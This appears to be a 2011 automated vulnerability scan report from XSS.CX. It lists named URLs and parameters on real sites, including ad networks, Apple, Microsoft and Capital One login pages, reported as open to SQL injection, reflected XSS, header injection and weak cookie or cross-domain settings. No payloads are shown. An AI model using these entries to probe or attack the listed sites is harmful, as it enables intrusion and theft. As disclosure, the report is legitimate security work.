XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07232011-01

Report generated by XSS.CX at Sat Jul 23 10:10:40 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]

1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]

1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]

1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]

2.4. http://ad.doubleclick.net/getcamphist [src parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]

3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]

3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]

3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]

3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]

3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]

3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]

3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]

3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]

3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]

3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]

3.20. http://a.netmng.com/hic/ [click parameter]

3.21. http://a.netmng.com/hic/ [click parameter]

3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]

3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]

3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]

3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]

3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]

3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]

3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]

3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.31. http://ad.turn.com/server/pixel.htm [sp parameter]

3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.34. http://ads.adap.tv/beacons [callback parameter]

3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]

3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

3.37. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.38. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.41. http://api.chartbeat.com/toppages/ [jsonp parameter]

3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]

3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]

3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]

3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

3.54. http://event.adxpose.com/event.flow [uid parameter]

3.55. http://home.myyearbook.com/Countries [callback parameter]

3.56. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]

3.57. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]

3.58. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]

3.59. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.60. http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.61. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.62. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.63. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.64. http://ib.adnxs.com/ab [ccd parameter]

3.65. http://ib.adnxs.com/ab [cnd parameter]

3.66. http://ib.adnxs.com/ab [referrer parameter]

3.67. http://ib.adnxs.com/ab [tt_code parameter]

3.68. http://ib.adnxs.com/ptj [redir parameter]

3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]

3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]

3.71. http://jlinks.industrybrains.com/jsct [ct parameter]

3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.73. http://js.revsci.net/gateway/gw.js [csid parameter]

3.74. http://km.support.apple.com/kb/index [doctype parameter]

3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.76. http://mm.chitika.net/minimall [callback parameter]

3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter]

3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter]

3.80. http://sgy.sitescout.com/tag.jsp [h parameter]

3.81. http://sgy.sitescout.com/tag.jsp [pid parameter]

3.82. http://sgy.sitescout.com/tag.jsp [w parameter]

3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter]

3.88. http://sm6.sitemeter.com/js/counter.js [site parameter]

3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]

3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]

3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]

3.92. http://widgets.klout.com/ [from parameter]

3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]

3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter]

3.95. http://www.lijit.com/delivery/fp [n parameter]

3.96. http://www.myyearbook.com/advertising/default.php [n parameter]

3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]

3.98. http://www.myyearbook.com/advertising/default.php [section parameter]

3.99. http://www.myyearbook.com/advertising/default.php [section parameter]

3.100. http://www.myyearbook.com/advertising/default.php [site parameter]

3.101. http://www.myyearbook.com/advertising/default.php [size parameter]

3.102. http://www.myyearbook.com/advertising/default.php [sub parameter]

3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]

3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]

3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]

3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]

3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]

3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]

3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]

3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]

3.129. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]

3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie]

3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie]

3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]

3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]

4. Flash cross-domain policy

4.1. http://a1.interclick.com/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://altfarm.mediaplex.com/crossdomain.xml

4.4. http://analytics.spongecell.com/crossdomain.xml

4.5. http://api.chartbeat.com/crossdomain.xml

4.6. http://api.facebook.com/crossdomain.xml

4.7. http://cdn.interclick.com/crossdomain.xml

4.8. http://clk.atdmt.com/crossdomain.xml

4.9. http://contextlinks.netseer.com/crossdomain.xml

4.10. http://fls.doubleclick.net/crossdomain.xml

4.11. http://gadgets.justanswer.com/crossdomain.xml

4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

4.13. http://ic.nexac.com/crossdomain.xml

4.14. http://img.mediaplex.com/crossdomain.xml

4.15. http://l.5min.com/crossdomain.xml

4.16. http://m.webtrends.com/crossdomain.xml

4.17. http://metrics.apple.com/crossdomain.xml

4.18. http://pfiles.5min.com/crossdomain.xml

4.19. http://pixel.everesttech.net/crossdomain.xml

4.20. http://pixel1350.everesttech.net/crossdomain.xml

4.21. http://pshared.5min.com/crossdomain.xml

4.22. http://puma.vizu.com/crossdomain.xml

4.23. http://rad.msn.com/crossdomain.xml

4.24. http://secure-us.imrworldwide.com/crossdomain.xml

4.25. http://syn.5min.com/crossdomain.xml

4.26. http://web2.checkm8.com/crossdomain.xml

4.27. http://www.righthealth.com/crossdomain.xml

4.28. http://community.spiceworks.com/crossdomain.xml

4.29. http://disqus.com/crossdomain.xml

4.30. http://feeds.bbci.co.uk/crossdomain.xml

4.31. http://googleads.g.doubleclick.net/crossdomain.xml

4.32. http://images.apple.com/crossdomain.xml

4.33. http://mm.chitika.net/crossdomain.xml

4.34. http://newsrss.bbc.co.uk/crossdomain.xml

4.35. http://pagead2.googlesyndication.com/crossdomain.xml

4.36. http://pubads.g.doubleclick.net/crossdomain.xml

4.37. http://static.ak.fbcdn.net/crossdomain.xml

4.38. http://www.apple.com/crossdomain.xml

4.39. http://www.disqus.com/crossdomain.xml

4.40. http://www.facebook.com/crossdomain.xml

4.41. http://www.scmagazineus.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://clk.atdmt.com/clientaccesspolicy.xml

5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

5.4. http://metrics.apple.com/clientaccesspolicy.xml

5.5. http://rad.msn.com/clientaccesspolicy.xml

5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.7. http://i.microsoft.com/clientaccesspolicy.xml

5.8. http://i3.microsoft.com/clientaccesspolicy.xml

5.9. http://www.microsoft.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

6.2. http://forums.vostu.com/

6.3. http://forums.vostu.com/forums/41-Como-Jogar

6.4. http://static.curse.com/themes/common/v6/scripts/core.js

6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

7. XML injection

7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]

7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]

8. Session token in URL

8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

8.3. http://games.myyearbook.com/

8.4. http://games.myyearbook.com/landing/pool

8.5. http://l.sharethis.com/pview

8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

8.9. http://mt0.googleapis.com/mapslt/ft

8.10. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

8.11. http://www.capitalone.com/redirect.php

8.12. http://www.datacard.com/combined.js

8.13. http://www.datacard.com/id/js/libs/hoverIntent-min.js

8.14. http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js

8.15. http://www.datacard.com/id/js/libs/thickbox-compressed.js

8.16. http://www.datacard.com/id/js/search/highlight-min.js

8.17. http://www.datacard.com/id/swfobject/swfobject.js

8.18. http://www.facebook.com/extern/login_status.php

8.19. http://www.google.com/recaptcha/api/challenge

8.20. http://www.pages05.net/WTS/event.jpeg

9. Password field submitted using GET method

10. Cookie scoped to parent domain

10.1. http://c.microsoft.com/trans_pixel.aspx

10.2. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

10.3. http://games.myyearbook.com/

10.4. http://games.myyearbook.com/landing/pool

10.5. http://hipservice.live.com/gethip.srf

10.6. http://home.myyearbook.com/Countries

10.7. http://home.myyearbook.com/feed/giftFeedItems

10.8. http://home.myyearbook.com/feed/myMagFeedItems

10.9. http://home.myyearbook.com/feed/tvFeedItems

10.10. http://pixel.everesttech.net/2368/gr

10.11. http://pixel1350.everesttech.net/1350/p

10.12. http://t.mookie1.com/t/v1/imp

10.13. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx

10.14. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911

10.15. http://a.netmng.com/hic/

10.16. http://a.tribalfusion.com/j.ad

10.17. http://a1.interclick.com/ColDta.aspx

10.18. http://ad.turn.com/server/ads.js

10.19. http://ad.turn.com/server/pixel.htm

10.20. http://ads.adap.tv/beacons

10.21. http://ads.adap.tv/cookie

10.22. http://ads.pointroll.com/PortalServe/

10.23. http://adx.adnxs.com/mapuid

10.24. http://ak1.abmr.net/is/a.collective-media.net

10.25. http://ak1.abmr.net/is/showadsak.pubmatic.com

10.26. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php

10.27. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php

10.28. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php

10.29. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php

10.30. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php

10.31. http://ap.lijit.com/www/delivery/retarget.php

10.32. http://api.bizographics.com/v1/profile.json

10.33. http://api.bizographics.com/v1/profile.redirect

10.34. http://apr.lijit.com///www/delivery/ajs.php

10.35. http://ar.voicefive.com/bmx3/broker.pli

10.36. http://at.amgdgt.com/ads/

10.37. http://b.scorecardresearch.com/b

10.38. http://b.scorecardresearch.com/p

10.39. http://b.scorecardresearch.com/r

10.40. http://b.voicefive.com/b

10.41. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

10.42. http://bh.contextweb.com/bh/getuid

10.43. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.44. http://c.atdmt.com/c.gif

10.45. http://c.bing.com/c.gif

10.46. http://c.live.com/c.gif

10.47. http://ce.lijit.com/merge

10.48. http://cf.addthis.com/red/p.json

10.49. http://clk.atdmt.com/goiframe/222276744/331989646/direct

10.50. http://clk.atdmt.com/goiframe/223672189/334126009/direct

10.51. http://cms.quantserve.com/dpixel

10.52. http://code.msdn.microsoft.com/

10.53. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js

10.54. http://code.msdn.microsoft.com/site/upload

10.55. http://community.spiceworks.com/r/595

10.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

10.57. http://cspix.media6degrees.com/orbserv/hbpix

10.58. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

10.59. http://gam.adnxs.com/gtj

10.60. http://home.live.com/search

10.61. http://home.live.com/search/

10.62. http://home.live.com/search/hip

10.63. http://i.w55c.net/ping_match.gif

10.64. http://ib.adnxs.com/ab

10.65. http://ib.adnxs.com/getuid

10.66. http://ib.adnxs.com/getuidnb

10.67. http://ib.adnxs.com/if

10.68. http://ib.adnxs.com/mapuid

10.69. http://ib.adnxs.com/ptj

10.70. http://ib.adnxs.com/ptj

10.71. http://ib.adnxs.com/ptj

10.72. http://ib.adnxs.com/seg

10.73. http://id.google.com/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif

10.74. http://id.google.com/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif

10.75. http://id.google.com/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif

10.76. http://id.google.com/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif

10.77. http://id.google.com/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif

10.78. http://idcs.interclick.com/Segment.aspx

10.79. http://image2.pubmatic.com/AdServer/Pug

10.80. http://image2.pubmatic.com/AdServer/Pug

10.81. http://image2.pubmatic.com/AdServer/Pug

10.82. http://images.apple.com/global/metrics/js/s_code_h.js

10.83. http://images.apple.com/global/nav/scripts/globalnav.js

10.84. http://images.apple.com/global/nav/styles/navigation.css

10.85. http://images.apple.com/global/scripts/apple_core.js

10.86. http://images.apple.com/global/scripts/browserdetect.js

10.87. http://images.apple.com/global/scripts/content_swap.js

10.88. http://images.apple.com/global/scripts/lib/event_mixins.js

10.89. http://images.apple.com/global/scripts/lib/prototype.js

10.90. http://images.apple.com/global/scripts/lib/scriptaculous.js

10.91. http://images.apple.com/global/scripts/overlay_panel.js

10.92. http://images.apple.com/global/scripts/promomanager.js

10.93. http://images.apple.com/global/scripts/search_decorator.js

10.94. http://images.apple.com/global/scripts/swap_view.js

10.95. http://images.apple.com/global/scripts/view_master_tracker.js

10.96. http://images.apple.com/global/styles/base.css

10.97. http://images.apple.com/macpro/scripts/pagenav.js

10.98. http://images.apple.com/macpro/scripts/performance.js

10.99. http://images.apple.com/metrics/scripts/s_code_h.js

10.100. http://images.apple.com/support/css/base_new.css

10.101. http://images.apple.com/support/css/global/nav/navigation.css

10.102. http://images.apple.com/support/css/suggest2.css

10.103. http://images.apple.com/support/css/support.css

10.104. http://images.apple.com/support/home/css/home2011.css

10.105. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js

10.106. http://images.apple.com/support/iknow/scripts/ACShortcuts.js

10.107. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js

10.108. http://images.apple.com/support/scripts/SCReporting.js

10.109. http://images.apple.com/support/scripts/module_decorator.js

10.110. http://images.apple.com/support/scripts/new_country.js

10.111. http://images.apple.com/support/scripts/new_support_coverage/cookies.js

10.112. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js

10.113. http://images.apple.com/support/scripts/new_support_coverage/functions.js

10.114. http://images.apple.com/support/scripts/psp_geos.js

10.115. http://images.apple.com/support/scripts/support.global.js

10.116. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js

10.117. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js

10.118. http://js.revsci.net/gateway/gw.js

10.119. http://leadback.advertising.com/adcedge/lb

10.120. http://lifescript.us.intellitxt.com/intellitxt/front.asp

10.121. http://lm.trafficmp.com/clicksense/epic

10.122. http://load.exelator.com/load/

10.123. http://m.adnxs.com/msftcookiehandler

10.124. http://media.fastclick.net/w/get.media

10.125. http://media.trafficmp.com/a/js

10.126. http://media.trafficmp.com/a/js

10.127. http://msdn.microsoft.com/magazine/ee336135.aspx

10.128. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0

10.129. http://odb.outbrain.com/utils/get

10.130. http://p.brilig.com/contact/bct

10.131. http://pix04.revsci.net/A11149/a4/0/0/123.302

10.132. http://pix04.revsci.net/D08734/a1/0/3/0.js

10.133. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

10.134. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js

10.135. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js

10.136. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js

10.137. http://pixel.33across.com/ps/

10.138. http://pixel.quantserve.com/pixel

10.139. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif

10.140. http://profile.live.com/Handlers/Plt.mvc

10.141. http://profile.live.com/favicon.ico

10.142. http://r.openx.net/set

10.143. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

10.144. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

10.145. http://rd.apmebf.com/w/get.media

10.146. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

10.147. http://rs.gwallet.com/r1/pixel/x960r=772053252

10.148. http://rt.legolas-media.com/lgrt

10.149. http://sales.liveperson.net/hc/54909046/

10.150. http://secure.adnxs.com/seg

10.151. http://segment-pixel.invitemedia.com/pixel

10.152. http://segment-pixel.invitemedia.com/set_partner_uid

10.153. http://segments.adap.tv/data

10.154. http://segments.adap.tv/data/

10.155. https://servicing.capitalone.com/c1/login.aspx

10.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet

10.157. http://sitelife.boston.com/ver1.0/Direct/Jsonp

10.158. http://social.msdn.microsoft.com/Search/en-US

10.159. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

10.160. http://sync.adap.tv/sync

10.161. http://sync.mathtag.com/sync/img

10.162. http://tags.bluekai.com/ids

10.163. http://tags.bluekai.com/site/2731

10.164. http://tags.bluekai.com/site/2751

10.165. http://tags.bluekai.com/site/365

10.166. http://uat.netmng.com/pixel/

10.167. http://user.lucidmedia.com/clicksense/user

10.168. http://user.lucidmedia.com/clicksense/user/browser

10.169. http://vap2den1.lijit.com/www/delivery/lg.php

10.170. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

10.171. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

10.172. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

10.173. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js

10.174. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

10.175. http://visualstudiogallery.msdn.microsoft.com/site/favorites

10.176. http://visualstudiogallery.msdn.microsoft.com/site/search

10.177. http://www.bing.com/fd/ls/l

10.178. http://www.bing.com/search

10.179. http://www.burstnet.com/enlightn/8117//3E06/

10.180. http://www.burstnet.com/enlightn/8171//99D2/

10.181. http://www.capitalone.com/autoloans/before-you-apply.php

10.182. http://www.capitalone.com/autoloans/redirect.php

10.183. http://www.capitalone.com/directbanking/

10.184. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

10.185. http://www.capitalone.com/redirect.php

10.186. http://www.capitalone.com/stylesheets/https-common/header.css

10.187. http://www.othersonline.com/partner/scripts/myyearbook/alice.js

10.188. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js

10.189. http://www.wtp101.com/pull_sync

11. Cookie without HttpOnly flag set

11.1. http://ads.adxpose.com/ads/ads.js

11.2. http://c.microsoft.com/trans_pixel.aspx

11.3. http://dg.specificclick.net/

11.4. http://event.adxpose.com/event.flow

11.5. http://games.myyearbook.com/

11.6. http://games.myyearbook.com/landing/pool

11.7. http://hipservice.live.com/gethip.srf

11.8. http://home.myyearbook.com/Countries

11.9. http://home.myyearbook.com/feed/giftFeedItems

11.10. http://home.myyearbook.com/feed/myMagFeedItems

11.11. http://home.myyearbook.com/feed/tvFeedItems

11.12. http://members.boston.com/reg/rdb.do

11.13. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140

